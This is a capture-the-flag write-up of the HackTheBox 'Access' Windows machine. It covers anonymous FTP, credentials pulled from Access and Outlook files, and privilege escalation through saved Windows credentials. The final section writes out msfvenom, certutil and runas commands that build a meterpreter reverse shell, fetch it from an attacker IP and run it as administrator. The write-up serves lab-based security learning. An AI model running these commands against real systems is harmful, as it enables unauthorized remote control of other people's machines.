Access @ HackTheBox

02Mar

Access @ HackTheBox

By CTF ,

In this short writeup I will show how I completed Access on hackthebox.eu, a quite easy windows box that involves parsing credentials from ms office files, converting mail formats and accessing saved windows credentials.

User Flag

The initial scan shows the following results:

21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

FTP can be accessed anonymously and allows to download 2 files, Backups\backup.mdb and Engineer\Access Control.zip. The zip file is protected with a password so the first thing I look at is the mdb file. There are some tools like mdb-tools that can parse so mdb format just fine but I decided that a quick string search with strings -n12 might be enough:

...
admin
backup_admin
engineer
access4u@security
...

This looks like username, password or mail address. Since we just found potential passwords we try them on the archive and access4u@security finally allows to unpack it. From the archive the file Access Control.pst is obtained, which is a file format for mails used by Microsoft. With readpst 'Access Control.pst' && cat 'Access Control.mbox I convert it to the mbox format to make it readable and find another password inside:

...
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.
...

With these credentials it is possible to telnet into the box as user security and read the user flag.

C:\Users\security\Desktop>type user.txt

Root Flag

Doing the usual enumeration I eventually check for stored credentials with cmdkey /list which shows that there are indeed stored ones for the administrator user:

C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

To get a root shell I generate a simple meterpreter reverse shell with msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.219 LPORT=5555 -f exe > xct.exe, download it with certutil certutil.exe -urlcache -split -f http://10.10.14.219:8000/xct.exe xct.exe and execute it with runas runas /user:administrator /savecred "xct.exe", which results in a root shell.

Share this post

Author

Related Posts

01May

.NET Remoting & WCF – Sharp @ HackTheBox

We will solve Sharp, a 40-point machine on HackTheBox that is all about C-Sharp & .Net. For user, we exploit... read more

25Jan

AI @ HackTheBox

AI is a 30 point machine on hackthebox that involves SQL injection via speech and abusing an exposed java debugging... read more

28Mar

Sniper @ HackTheBox

Sniper is a 30-point machine on HackTheBox that involves abusing a remote file inclusion and uploading a crafted chm file... read more

18Apr

Mango @ HackTheBox

Mango is a 30-point linux machine on hackthebox that involves a NoSQL-Injection which allows to obtain user passwords from a... read more

30May

Resolute @ HackTheBox

Resolute is a 30-point Windows machine on HackTheBox that involves enumerating LDAP, Password Spraying, and using the DNSAdmins group to... read more

26Jun

WordPress & Initctl on ChromeOS – Spectra @ HackTheBox

My video about Spectra, a 20-point machine on HackTheBox that involves admin access to a WordPress site, allowing us to... read more

28Apr

Bastion @ HackTheBox

Bastion is an easy 20 points machine on hackthebox. It is about mounting a .vhd file over the network, retrieving... read more

10Jun

Smasher 2 @ HackTheBox

Smasher2 is a difficult 50 points machine on hackthebox, involving some guessing to get the user flag (because the author... read more

14Aug

DNS Rebinding, XSS & 2FA SSH – Crossfit2 @ HackTheBox

We are solving Crossfit2, a 50-point OpenBSD machine on HackTheBox. read more

19Jan

Lab – Baby Walkthrough

Baby is an easy machine on Vulnlab that involves enumerating LDAP & spraying credentials. For SYSTEM we exploit SeBackup &... read more